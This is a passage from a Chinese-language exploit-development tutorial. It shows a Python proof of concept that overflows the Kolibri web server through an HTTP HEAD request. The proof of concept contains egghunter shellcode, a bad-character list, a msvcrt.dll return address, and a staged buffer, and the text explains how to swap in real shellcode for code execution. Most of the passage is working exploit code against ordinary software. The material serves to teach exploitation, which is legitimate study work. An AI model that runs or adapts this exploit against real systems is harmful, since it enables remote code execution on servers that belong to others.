Question

现在只剩下布置蛋(shellcode) 了. HTPP 请求包含几个字段，不是所有的字段都有必要设置，为了方便我把它们叫做字段 1,2,3,4,5 让我们看了看设置’User-Agent’为 1000 字节 metasploit 模式的字符串时候会发生什么, POC 如下:

#!/usr/bin/python
 
import socket
import os
import sys
 
#Egghunter
#Size 32-bytes
hunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33" #b3
"\x33\x66\x8b\xfa" #3f
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
 
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f                      #
#-------------------------------------------------------------------------------#
# Stage1:                                     #
# (1) EIP: 0x77C35459 push esp # ret | msvcrt.dll                 #
# (2) ESP: jump back 60 bytes in the buffer => \xEB\xC4             #
# (3) Enough room for egghunter; marker "b33f"                  #
#-------------------------------------------------------------------------------#
 
Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4"
Stage2 = "Aa0Aa1Aa...0Bh1Bh2B" #1000-bytes
 
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.111.128:8080\r\n"
"User-Agent: " + Stage2 + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
 
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()

附加 Kolibri 到调试器，然后在 0x77C35459 下断. 用!mona 搜索 metasploit 模式字符串，试了三次都能搜索到，事实上我做了一些测试，我们完全可以注入更大的空间虽然 1000 字节已经足够大了。

如果在第二部分用蛋(shellcode) 而不是 metasploi 模式的字符串，寻蛋指令将会搜到内存找到 shellcode 并执行它，事实上教程到这里应该可以结束了,